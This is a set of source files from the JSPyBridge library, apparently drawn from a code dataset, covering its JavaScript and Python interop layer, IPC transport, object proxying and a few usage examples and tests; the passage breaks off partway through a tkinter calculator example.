"alphanum_fraction": 0.591354489326477, "avg_line_length": 28.658119201660156, "blob_id": "1fbe7f0143990b34b44546e45466fcfbbdee6c20", "content_id": "fd6101132e8519499c514641b2e18f7e99b74352", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3470, "license_type": "permissive", "max_line_length": 106, "num_lines": 117, "path": "/src/pythonia/index.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "if (typeof process !== 'undefined' && parseInt(process.versions.node.split('.')[0]) < 16) {\n console.error('Your node version is currently', process.versions.node)\n console.error('Please update it to a version >= 16.x.x from https://nodejs.org/')\n process.exit(1)\n}\n\nif (typeof window !== 'undefined') {\n var { StdioCom } = require('./WebsocketCom')\n} else {\n var { StdioCom } = process.platform === 'win32' ? require('./StdioCom') : require('./IpcPipeCom')\n}\n\nconst { dirname, join, resolve } = require('path')\nconst { PyClass, Bridge } = require('./Bridge')\nconst getCaller = require('caller')\n\nconst com = new StdioCom()\nconst bridge = new Bridge(com)\nglobalThis.__pythonBridge = bridge\nconst root = bridge.makePyObject(0)\n\nasync function py (tokens, ...replacements) {\n const vars = {} // List of locals\n let nstr = ''\n for (let i = 0; i < tokens.length; i++) {\n const token = tokens[i]\n const repl = await replacements[i]\n if (repl != null) {\n const v = '__' + i\n vars[v] = (repl.ffid ? ({ ffid: repl.ffid }) : repl)\n nstr += token + v\n } else {\n nstr += token\n }\n }\n return root.eval(nstr, null, vars)\n}\n\n// same as above but with eval instead -- todo: auto fix indent\nasync function pyExec (tokens, ...replacements) {\n const vars = {} // List of locals\n let nstr = ''\n for (let i = 0; i < tokens.length; i++) {\n const token = tokens[i]\n const repl = await replacements[i]\n if (repl != null) {\n const v = '__' + i\n vars[v] = (repl.ffid ? 
({ ffid: repl.ffid }) : repl)\n nstr += token + v\n } else {\n nstr += token\n }\n }\n return root.exec(nstr, null, vars)\n}\n\npy.enumerate = what => root.enumerate(what)\npy.tuple = (...items) => root.tuple(items)\npy.set = (...items) => root.set(items)\npy.exec = pyExec\npy.with = async (using, fn) => {\n const handle = await (await using).__enter__()\n await fn(handle)\n await py`${using}.__exit__(*sys.exc_info())`\n}\n\nmodule.exports = {\n PyClass,\n builtins: root,\n py,\n python (file) {\n // The Python process could have been exited. In which case we want to start it again on a new import.\n if (!com.proc) com.start()\n if (file.startsWith('/') || file.startsWith('./') || file.startsWith('../') || file.includes(':')) {\n if (file.startsWith('.')) {\n const caller = getCaller(1)\n const prefix = process.platform === 'win32' ? 'file:///' : 'file://'\n const callerDir = caller.replace(prefix, '').split(/\\/|\\\\/).slice(0, -1).join('/')\n file = join(callerDir, file)\n }\n const importPath = resolve(file)\n const fname = file.split('/').pop() || file\n return root.fileImport(fname, importPath, dirname(importPath))\n }\n return root.python(file)\n },\n com\n}\nmodule.exports.python.exit = () => {\n bridge.end()\n com.end()\n}\nmodule.exports.python.cwd = path => {\n if (!path) {\n const caller = getCaller(1)\n const prefix = process.platform === 'win32' ? 'file:///' : 'file://'\n path = caller.replace(prefix, '').split('/').slice(0, -1).join('/')\n }\n return py`os.chdir(${path.replace('\\\\', '/')})`\n}\nmodule.exports.python.setFastMode = (val) => {\n root.sendInspect(!val)\n}\n\nif (typeof window !== 'undefined') {\n window.Python = module.exports\n\n console._log = console.log\n console.log = (...args) => {\n const nargs = []\n for (const arg of args) {\n if (arg.ffid) nargs.push(arg.$$.inspect())\n else nargs.push(arg)\n }\n console._log(...nargs)\n }\n}\n" }, { "alpha_fraction": 0.604519784450531, "alphanum_fraction": 0.6113801598548889, "avg_line_length": 29.219512939453125, "blob_id": "5f77f7a7620ebf48d955513af78398a16bd8c75f", "content_id": "8e8c6403c0920c67a4e73c907d79f22035e92f0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2478, "license_type": "permissive", "max_line_length": 105, "num_lines": 82, "path": "/src/pythonia/IpcPipeCom.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const cp = require('child_process')\nconst { join } = require('path')\n\nconst log = process.env.DEBUG ? console.log : () => {}\n\n// TODO: are dangling handlers an issue?\nclass StdioCom {\n constructor () {\n this.start()\n }\n\n start () {\n this.handlers = {}\n const stdio = ['inherit', 'inherit', 'inherit', 'ipc']\n const args = [join(__dirname, 'interface.py')]\n try {\n this.proc = cp.spawn(process.env.PYTHON_BIN || 'python3', args, { stdio })\n } catch (e) {\n if (e.code === 'ENOENT' && !process.env.PYTHON_BIN) this.proc = cp.spawn('python', args, { stdio })\n else throw e\n }\n // BAD HACK: since the channel is not exposed, and we need to send JSON with a\n // custom serializer, we basically have two choices:\n // 1) either JSON.stringify it with a custom encoder in our lib, then have it JSON.stringified\n // *again* in the Node.js standard lib, then unwrapped twice in Python, or\n // 2) use a hack to get the low level IPC API and write raw strings to it.\n // There is no 'string' serialization option for IPC. 
It's either JSON or 'Advanced' which uses\n // internal V8 serialization APIs; fast but unusable in Python.\n // See https://github.com/nodejs/node/issues/39317\n const symbols = Object.getOwnPropertySymbols(this.proc)\n const symbol = symbols.find(sym => sym.toString() === 'Symbol(kChannelHandle)')\n const channel = this.proc[symbol]\n channel._writeUtf8String = channel.writeUtf8String\n let ww\n channel.writeUtf8String = (...a) => {\n ww = a[0].constructor\n channel.writeUtf8String = channel._writeUtf8String\n return channel._writeUtf8String.apply(channel, a)\n }\n this.proc.send('')\n this._writeRaw = data => channel.writeUtf8String(new ww(), data)\n this.proc.on('message', data => {\n this.recieve(data)\n })\n }\n\n end () {\n this.proc.kill('SIGKILL')\n this.proc = null\n }\n\n recieve (j) {\n log('[py -> js]', j)\n if (this.handlers[j.c]) {\n return this.handlers[j.c](j)\n }\n if (this.handlers[j.r]) {\n if (this.handlers[j.r](j)) {\n return\n }\n delete this.handlers[j.r]\n }\n }\n\n register (eventId, cb) {\n this.handlers[eventId] = cb\n }\n\n write (what, cb) {\n log('[js -> py]', what)\n this.proc.send(what)\n if (cb) this.register(what.r, cb)\n }\n\n writeRaw (what, r, cb) {\n log('[js -> py]', what)\n this._writeRaw(what + '\\n')\n this.register(r, cb)\n }\n}\n\nmodule.exports = { StdioCom }\n" }, { "alpha_fraction": 0.6632652878761292, "alphanum_fraction": 0.6836734414100647, "avg_line_length": 23.625, "blob_id": "92031b993d2c3c27331c72a38156a6e59549b5fb", "content_id": "843878fbcde7f8a0698631301da7f8800c76874d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "permissive", "max_line_length": 54, "num_lines": 8, "path": "/examples/python/cheerio.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "from javascript import require\ncheerio = require('cheerio');\nC = cheerio.load('<h2 class=\"title\">Hello world</h2>')\n\nC('h2.title').text('Hello there!')\nC('h2').addClass('welcome')\n\nprint(C.html())" }, { "alpha_fraction": 0.5175154209136963, "alphanum_fraction": 0.5183519721031189, "avg_line_length": 34.28782272338867, "blob_id": "e730d86c4dec647570d5752097514cc023e20e25", "content_id": "a7700b1ed356ca6f1aa211a369fac07d51451c36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9566, "license_type": "permissive", "max_line_length": 99, "num_lines": 271, "path": "/src/javascript/pyi.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# THe Python Interface for JavaScript\n\nimport inspect, importlib, traceback\nimport os, sys, json, types\nimport socket\nfrom .proxy import Proxy\nfrom .errors import JavaScriptError, getErrorMessage\nfrom weakref import WeakValueDictionary\n\n\ndef python(method):\n return importlib.import_module(method, package=None)\n\n\ndef fileImport(moduleName, absolutePath, folderPath):\n if folderPath not in sys.path:\n sys.path.append(folderPath)\n spec = importlib.util.spec_from_file_location(moduleName, absolutePath)\n foo = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(foo)\n return foo\n\n\nclass Iterate:\n def __init__(self, v):\n self.what = v\n\n # If we have a normal iterator, we need to make it a generator\n if inspect.isgeneratorfunction(v):\n it = self.next_gen()\n elif hasattr(v, \"__iter__\"):\n it = self.next_iter()\n\n def next_iter():\n try:\n return next(it)\n except Exception:\n return \"$$STOPITER\"\n\n self.Next = 
next_iter\n\n def next_iter(self):\n for entry in self.what:\n yield entry\n return\n\n def next_gen(self):\n yield self.what()\n\n\nfix_key = lambda key: key.replace(\"~~\", \"\") if type(key) is str else key\n\n\nclass PyInterface:\n m = {0: {\"python\": python, \"fileImport\": fileImport, \"Iterate\": Iterate}}\n # Things added to this dict are auto GC'ed\n weakmap = WeakValueDictionary()\n cur_ffid = 10000\n\n def __init__(self, ipc, exe):\n self.ipc = ipc\n # This toggles if we want to send inspect data for console logging. It's auto\n # disabled when a for loop is active; use `repr` to request logging instead.\n self.m[0][\"sendInspect\"] = lambda x: setattr(self, \"send_inspect\", x)\n self.send_inspect = True\n self.q = lambda r, key, val, sig=\"\": self.ipc.queue_payload(\n {\"c\": \"pyi\", \"r\": r, \"key\": key, \"val\": val, \"sig\": sig}\n )\n self.executor = exe\n\n def assign_ffid(self, what):\n self.cur_ffid += 1\n self.m[self.cur_ffid] = what\n return self.cur_ffid\n\n def length(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n l = len(v)\n self.q(r, \"num\", l)\n\n def init(self, r, ffid, key, args):\n v = self.m[ffid](*args)\n ffid = self.assign_ffid(v)\n self.q(r, \"inst\", ffid)\n\n def call(self, r, ffid, keys, args, kwargs, invoke=True):\n v = self.m[ffid]\n # Subtle differences here depending on if we want to call or get a property.\n # Since in Python, items ([]) and attributes (.) function differently,\n # when calling first we want to try . then []\n # For example with the .append function we don't want ['append'] taking\n # precedence in a dict. 
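Dict keys that happen to collide with method names are the\n # motivating case. 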
However if we're only getting objects, we can\n # first try bracket for dicts, then attributes.\n if invoke:\n for key in keys:\n t = getattr(v, str(key), None)\n if t:\n v = t\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n elif hasattr(v, \"__getitem__\"):\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n else:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n\n # Classes when called will return void, but we need to return\n # object to JS.\n was_class = False\n if invoke:\n if inspect.isclass(v):\n was_class = True\n v = v(*args, **kwargs)\n typ = type(v)\n if typ is str:\n self.q(r, \"string\", v)\n return\n if typ is int or typ is float or (v is None) or (v is True) or (v is False):\n self.q(r, \"int\", v)\n return\n if inspect.isclass(v) or isinstance(v, type):\n # We need to increment FFID\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n if callable(v): # anything with __call__\n self.q(r, \"fn\", self.assign_ffid(v), self.make_signature(v))\n return\n if (typ is dict) or (inspect.ismodule(v)) or was_class: # \"object\" in JS speak\n self.q(r, \"obj\", self.assign_ffid(v), self.make_signature(v))\n return\n if typ is list:\n self.q(r, \"list\", self.assign_ffid(v), self.make_signature(v))\n return\n if hasattr(v, \"__class__\"): # numpy generator can't be picked up without this\n self.q(r, \"class\", self.assign_ffid(v), self.make_signature(v))\n return\n self.q(r, \"void\", self.cur_ffid)\n\n # Same as call just without invoking anything, and args\n # would be null\n def get(self, r, ffid, keys, args):\n o = self.call(r, ffid, keys, [], {}, invoke=False)\n return o\n\n def Set(self, r, ffid, keys, args):\n v = self.m[ffid]\n on, val = args\n for key in keys:\n if type(v) in (dict, tuple, list):\n v = v[key]\n elif hasattr(v, str(key)):\n v = getattr(v, str(key))\n else:\n try:\n v = v[key]\n except:\n raise LookupError(f\"Property '{fix_key(key)}' does not exist on {repr(v)}\")\n if type(v) in (dict, tuple, list, set):\n v[on] = val\n else:\n setattr(v, on, val)\n self.q(r, \"void\", self.cur_ffid)\n\n def inspect(self, r, ffid, keys, args):\n v = self.m[ffid]\n for key in keys:\n v = getattr(v, key, None) or v[key]\n s = repr(v)\n self.q(r, \"\", s)\n\n # no ACK needed\n def free(self, r, ffid, key, args):\n for i in args:\n if i not in self.m:\n continue\n del self.m[i]\n\n def make_signature(self, what):\n if self.send_inspect:\n return repr(what)\n return \"\"\n\n def read(self):\n data = apiin.readline()\n if not data:\n exit()\n j = json.loads(data)\n return j\n\n def pcall(self, r, ffid, key, args, set_attr=False):\n # Convert special JSON objects to Python methods\n def process(json_input, lookup_key):\n if isinstance(json_input, dict):\n for k, v in json_input.items():\n if isinstance(v, dict) and (lookup_key in v):\n ffid = v[lookup_key]\n json_input[k] = Proxy(self.executor, ffid)\n else:\n process(v, lookup_key)\n elif isinstance(json_input, list):\n for k, v in enumerate(json_input):\n if isinstance(v, dict) and (lookup_key in v):\n ffid = v[lookup_key]\n json_input[k] = Proxy(self.executor, ffid)\n else:\n process(v, 
lookup_key)\n\n process(args, \"ffid\")\n pargs, kwargs = args\n if set_attr:\n self.Set(r, ffid, key, pargs)\n else:\n self.call(r, ffid, key, pargs, kwargs or {})\n\n def setval(self, r, ffid, key, args):\n return self.pcall(r, ffid, key, args, set_attr=True)\n\n # This returns a primitive version (JSON-serialized) of the object\n # including arrays and dictionary/object maps, unlike what the .get\n # and .call methods do where they only return numeric/strings as\n # primitive values and everything else is an object refrence.\n def value(self, r, ffid, keys, args):\n v = self.m[ffid]\n\n for key in keys:\n t = getattr(v, str(key), None)\n if t is None:\n v = v[key] # 🚨 If you get an error here, you called an undefined property\n else:\n v = t\n\n # TODO: do we realy want to worry about functions/classes here?\n # we're only supposed to send primitives, probably best to ignore\n # everything else.\n # payload = json.dumps(v, default=lambda arg: None)\n self.q(r, \"ser\", v)\n\n def onMessage(self, r, action, ffid, key, args):\n try:\n return getattr(self, action)(r, ffid, key, args)\n except Exception:\n self.q(r, \"error\", \"\", traceback.format_exc())\n pass\n\n def inbound(self, j):\n return self.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n" }, { "alpha_fraction": 0.5141158699989319, "alphanum_fraction": 0.5453194379806519, "avg_line_length": 17.69444465637207, "blob_id": "4da0f27ac9a92f9ef014172f48686591de4df902", "content_id": "8f14ae0ea9abeda0a794530bc5ebc27e96f9250b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 673, "license_type": "permissive", "max_line_length": 55, "num_lines": 36, "path": "/test/pythonia/demo.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "def add(demoClas1, demoClas2):\n # print(\"dc\", demoClas1, demoClas2)\n return demoClas1.var + demoClas2.var\n\n\ndef throw():\n raise Exception(\"hey I crashed!\")\n\n\ndef special(pos1, pos2, /, kwarg1=None, **kwargs):\n print(\"Fn call\", pos1, pos2, kwarg1, kwargs)\n\n\nclass DemoClass:\n \"\"\"Some doc\"\"\"\n\n def __init__(self, var):\n self.var = var\n\n def get(self, update):\n return self.var + update\n\n def nested(self):\n def some():\n return 3\n\n return some\n\n def arr(self):\n return [1, 2, 4]\n\n def barr(self):\n return bytearray()\n\n def dic(self):\n return {\"x\": {\"y\": 4, \"z\": [5, 6, 7, 8, None]}}\n" }, { "alpha_fraction": 0.5790576338768005, "alphanum_fraction": 0.5812801718711853, "avg_line_length": 34.62895965576172, "blob_id": "114d39c7ff4bbfb33c1b621bc135b0cbeab6b649", "content_id": "06a567d8af33974f3a4e324e3e171c34de60ea86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 15748, "license_type": "permissive", "max_line_length": 144, "num_lines": 442, "path": "/src/pythonia/Bridge.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const util = require('util')\nconst { JSBridge } = require('./jsi')\nconst errors = require('./errors')\nconst log = process.env.DEBUG ? console.debug : () => {}\n// const log = console.log\nconst REQ_TIMEOUT = 100000\n\nclass BridgeException extends Error {\n constructor (...a) {\n super(...a)\n this.message += ` Python didn't respond in time (${REQ_TIMEOUT}ms), look above for any Python errors. 
If no errors, the API call hung.`\n // We'll fix the stack trace once this is shipped.\n }\n}\n\nclass PythonException extends Error {\n constructor (stack, error) {\n super()\n const trace = this.stack.split('\\n').slice(1).join('\\n')\n this.stack = errors.getErrorMessage(stack.join('.'), trace, error)\n }\n}\n\nclass PyClass {\n // Hard privates to avoid tripping over our internal things\n #current = {}\n #userInit\n #superclass\n #superargs\n #superkwargs\n #trap\n constructor (superclass, superArgs = [], superKwargs = {}) {\n if (this.init) this.#userInit = this.init\n this.init = this.#init\n this.#superclass = superclass\n this.#superargs = superArgs\n this.#superkwargs = superKwargs\n if (!Array.isArray(superArgs)) {\n throw new SyntaxError('Second parameter to PyClass super must be the positional arguments to pass to the Python superclass')\n }\n if (typeof superKwargs !== 'object') {\n throw new SyntaxError('Third parameter to PyClass super must be an object which holds keyword arguments to pass to the Python superclass')\n }\n }\n\n static init (...args) {\n const clas = new this(...args)\n return clas.init()\n }\n\n async #init (bridge = globalThis.__pythonBridge) {\n if (this.#trap) throw 'cannot re-init'\n const name = this.constructor.name\n const variables = Object.getOwnPropertyNames(this)\n // Set.has() is faster than Array.includes which is O(n)\n const members = new Set(Object.getOwnPropertyNames(Object.getPrototypeOf(this)).filter(k => k !== 'constructor'))\n // This would be a proxy to Python ... it creates the class & calls __init__ in one pass\n const sup = await this.#superclass\n const [ffid, pyClass] = await bridge.makePyClass(this, name, {\n name,\n overriden: [...variables, ...members],\n bases: this.#superclass ? [[sup.ffid, this.#superargs, this.#superkwargs]] : []\n })\n this.pyffid = ffid\n\n const makeProxy = (target, forceParent) => {\n return new Proxy(target, {\n get: (target, prop) => {\n const pname = prop !== 'then' ? 
'~~' + prop : prop\n if (forceParent) return pyClass[pname]\n if (prop === 'ffid') return this.pyffid\n if (prop === 'toJSON') return () => ({ ffid })\n if (prop === 'parent') return target.parent\n if (members.has(prop)) return this[prop]\n else return pyClass[pname]\n },\n set: (target, prop, val) => {\n const pname = prop\n if (prop === 'parent') throw RangeError('illegal reserved property change')\n if (forceParent) return pyClass[pname] = val\n if (members.has(prop)) return this[prop] = val\n else return pyClass[pname] = val\n },\n apply: (target, self, args) => {\n const prop = '__call__'\n if (this[prop]) {\n return this[prop](...args)\n } else {\n return pyClass[prop](...args)\n }\n }\n })\n }\n class Trap extends Function {\n constructor () {\n super()\n this.base = makeProxy(this, false)\n this.parent = makeProxy(this, true)\n }\n }\n this.#trap = new Trap()\n\n for (const member of members) {\n const fn = this[member]\n this.#current[member] = fn\n // Rebind `this` in each of the class members to use our router\n this[member] = fn.bind(this.#trap.base)\n }\n\n await this.#userInit?.call(this.#trap.base)\n return this.#trap.base\n }\n}\n\nasync function waitFor (cb, withTimeout, onTimeout) {\n let t\n if (withTimeout === Infinity) return new Promise(resolve => cb(resolve))\n const ret = await Promise.race([\n new Promise(resolve => cb(resolve)),\n new Promise(resolve => { t = setTimeout(() => resolve('timeout'), withTimeout) })\n ])\n clearTimeout(t)\n if (ret === 'timeout') onTimeout()\n return ret\n}\n\nlet nextReqId = 10000\nconst nextReq = () => nextReqId++\n\nclass Bridge {\n constructor (com) {\n this.com = com\n // This is a ref map used so Python can call back JS APIs\n this.jrefs = {}\n\n // We don't want to GC things individually, so batch all the GCs at once\n // to Python\n this.freeable = []\n this.loop = setInterval(this.runTasks, 1000)\n\n // This is called on GC\n this.finalizer = new FinalizationRegistry(ffid => {\n this.freeable.push(ffid)\n // Once the Proxy is freed, we also want to release the pyClass ref\n try { delete this.jsi.m[ffid] } catch {}\n })\n\n this.jsi = new JSBridge(null, this)\n this.jsi.ipc = {\n send: async req => {\n this.com.write(req)\n },\n makePyObject: ffid => this.makePyObject(ffid)\n }\n this.com.register('jsi', this.jsi.onMessage.bind(this.jsi))\n }\n\n runTasks = () => {\n if (this.freeable.length) this.free(this.freeable)\n this.freeable = []\n }\n\n end () {\n clearInterval(this.loop)\n }\n\n request (req, cb) {\n // When we call Python functions with Proxy parameters, we need to just send the FFID\n // so it can be mapped on the Python side.\n this.com.write(req, cb)\n }\n\n async len (ffid, stack) {\n const req = { r: nextReq(), action: 'length', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async get (ffid, stack, args, suppressErrors) {\n const req = { r: nextReq(), action: 'get', ffid: ffid, key: stack, val: args }\n\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') {\n if (suppressErrors) return undefined\n throw new PythonException(stack, resp.sig)\n }\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // 
Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n async call (ffid, stack, args, kwargs, set, timeout) {\n const made = {}\n const r = nextReq()\n const req = { r, action: set ? 'setval' : 'pcall', ffid: ffid, key: stack, val: [args, kwargs] }\n // The following serializes our arguments and sends them to Python.\n // When we provide FFID as '', we ask Python to assign a new FFID on\n // its side for the purpose of this function call, then to return\n // the number back to us\n const payload = JSON.stringify(req, (k, v) => {\n if (!k) return v\n if (v && !v.r) {\n if (v instanceof PyClass) {\n const r = nextReq()\n made[r] = v\n return { r, ffid: '', extend: v.pyffid }\n }\n if (v.ffid) return { ffid: v.ffid }\n if (\n typeof v === 'function' ||\n (typeof v === 'object' && (v.constructor.name !== 'Object' && v.constructor.name !== 'Array'))\n ) {\n const r = nextReq()\n made[r] = v\n return { r, ffid: '' }\n }\n }\n return v\n })\n\n const resp = await waitFor(resolve => this.com.writeRaw(payload, r, pre => {\n if (pre.key === 'pre') {\n for (const r in pre.val) {\n const ffid = pre.val[r]\n // Python is the owner of the memory, we borrow a ref to it and once\n // we're done with it (GC'd), we can ask Python to free it\n if (made[r] instanceof Promise) throw Error('You did not await a parameter when calling ' + stack.join('.'))\n this.jsi.m[ffid] = made[r]\n this.queueForCollection(ffid, made[r])\n }\n return true\n } else {\n resolve(pre)\n }\n }), timeout || REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n\n if (set) {\n return true // Do not allocate new FFID if setting\n }\n\n log('call', ffid, stack, args, resp)\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n async value (ffid, stack) {\n const req = { r: nextReq(), action: 'value', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async inspect (ffid, stack) {\n const req = { r: nextReq(), action: 'inspect', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async free (ffids) {\n const req = { r: nextReq(), action: 'free', ffid: '', key: '', val: ffids }\n this.request(req)\n return true\n }\n\n queueForCollection (ffid, val) {\n this.finalizer.register(val, ffid)\n }\n\n /**\n * This method creates a Python class which proxies overridden entries\n * on the JS side over to JS. 
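(For example, a method defined on the JS class body is registered as overridden, so Python dispatches calls to it back to the JS implementation.) 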
Conversely, in JS when a property access\n * is performed on an object that doesn't exist, it's sent to Python.\n */\n async makePyClass (inst, name, props) {\n const req = { r: nextReq(), action: 'makeclass', ffid: '', key: name, val: props }\n const resp = await waitFor(cb => this.request(req, cb), 500, () => {\n throw new BridgeException(`Attempt to create '${name}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException([name], resp.sig)\n // Python puts a new proxy into its ref map, and we get the ref ID for it.\n // We don't put ours into our map; allow normal GC on our side and once\n // it is, it'll be freed on the Python side.\n this.jsi.addWeakRef(inst, resp.val[0])\n // Track when our class gets GC'ed so we can erase it on the Python side\n this.queueForCollection(resp.val[0], inst)\n // Return the Python instance - when it gets freed, the\n // other ref on the Python side is also freed.\n return [resp.val[1], this.makePyObject(resp.val[1], resp.sig)]\n }\n\n makePyObject (ffid, inspectString) {\n const self = this\n // \"Intermediate\" objects are returned while chaining. If the user tries to log\n // an Intermediate then we know they forgot to use await, as if they were to use\n // await, then() would be implicitly called where we wouldn't return a Proxy, but\n // a Promise. Must extend Function to be a \"callable\" object in JS for the Proxy.\n class Intermediate extends Function {\n constructor (callstack) {\n super()\n this.callstack = [...callstack]\n }\n\n [util.inspect.custom] () {\n return '\\n[You must use await when calling a Python API]\\n'\n }\n }\n const handler = {\n get: (target, prop, receiver) => {\n const next = new Intermediate(target.callstack)\n // log('`prop', next.callstack, prop)\n if (prop === '$$') return target\n if (prop === 'ffid') return ffid\n if (prop === 'toJSON') return () => ({ ffid })\n if (prop === 'toString' && inspectString) return target[prop]\n if (prop === 'then') {\n // Avoid .then loops\n if (!next.callstack.length) {\n return undefined\n }\n return (resolve, reject) => {\n const suppressErrors = next.callstack[next.callstack.length - 1].endsWith?.('$')\n if (suppressErrors) {\n next.callstack.push(next.callstack.pop().replace('$', ''))\n }\n this.get(ffid, next.callstack, [], suppressErrors).then(resolve).catch(reject)\n next.callstack = [] // Empty the callstack after running fn\n }\n }\n if (prop === 'length') return this.len(ffid, next.callstack, [])\n if (typeof prop === 'symbol') {\n if (prop === Symbol.iterator) {\n // This is just for destructuring arrays\n return function *iter () {\n for (let i = 0; i < 100; i++) {\n const next = new Intermediate([...target.callstack, i])\n yield new Proxy(next, handler)\n }\n throw SyntaxError('You must use `for await` when iterating over a Python object in a for-of loop')\n }\n }\n if (prop === Symbol.asyncIterator) {\n return async function *iter () {\n const it = await self.call(0, ['Iterate'], [{ ffid }])\n while (true) {\n const val = await it.Next()\n if (val === '$$STOPITER') {\n return\n } else {\n yield val\n }\n }\n }\n }\n log('Get symbol', next.callstack, prop)\n return\n }\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n next.callstack.push(prop)\n return new Proxy(next, handler) // no $ and not fn call, continue chaining\n },\n apply: (target, self, args) => { // Called for function call\n const final = target.callstack[target.callstack.length - 1]\n let kwargs, timeout\n if (final === 'apply') {\n target.callstack.pop()\n args = [args[0], 
...args[1]]\n } else if (final === 'call') {\n target.callstack.pop()\n } else if (final?.endsWith('$')) {\n kwargs = args.pop()\n timeout = kwargs.$timeout\n delete kwargs.$timeout\n target.callstack[target.callstack.length - 1] = final.slice(0, -1)\n } else if (final === 'valueOf') {\n target.callstack.pop()\n const ret = this.value(ffid, [...target.callstack])\n return ret\n } else if (final === 'toString') {\n target.callstack.pop()\n const ret = this.inspect(ffid, [...target.callstack])\n return ret\n }\n const ret = this.call(ffid, target.callstack, args, kwargs, false, timeout)\n target.callstack = [] // Flush callstack to py\n return ret\n },\n set: (target, prop, val) => {\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n const ret = this.call(ffid, [...target.callstack], [prop, val], {}, true)\n return ret\n }\n }\n // A CustomLogger is just here to allow the user to console.log Python objects\n // since this must be sync, we need to call inspect in Python along with every CALL or GET\n // operation, which does bring some small overhead.\n class CustomLogger extends Function {\n constructor () {\n super()\n this.callstack = []\n }\n\n [util.inspect.custom] () {\n return inspectString || \"(Some Python object) Use `await object.toString()` to get this object's repr().\"\n }\n\n toString () {\n return inspectString || '(Some Python object)'\n }\n }\n return new Proxy(new CustomLogger(), handler)\n }\n}\n\nmodule.exports = { PyClass, Bridge }\n" }, { "alpha_fraction": 0.5593952536582947, "alphanum_fraction": 0.5788336992263794, "avg_line_length": 24.72222137451172, "blob_id": "96713a94fa42cb993015f7b2fc74f9117bf6fe3c", "content_id": "8938505d95a3136caaf56233e3d12756c5e9b778", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1389, "license_type": "permissive", "max_line_length": 97, "num_lines": 54, "path": "/examples/javascript/calculator.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import { python } from 'pythonia'\nconst tk = await python('tkinter')\n\nlet expression = ''\nlet equation\n\nasync function press (num) {\n if (num === '=') {\n try {\n console.info('Evaluating:', expression)\n const total = eval(expression)\n await equation.set(total)\n } catch (e) {\n await equation.set(' error ')\n expression = ''\n }\n } else if (num === 'Clear') {\n expression = ''\n await equation.set('')\n } else {\n expression += num\n await equation.set(expression)\n }\n}\n\nasync function main () {\n const gui = await tk.Tk()\n await gui.configure({ background: 'light green' })\n await gui.title('Simple Calculator')\n await gui.geometry('270x150')\n equation = await tk.StringVar()\n const expression_field = await tk.Entry$(gui, { textvariable: equation })\n await 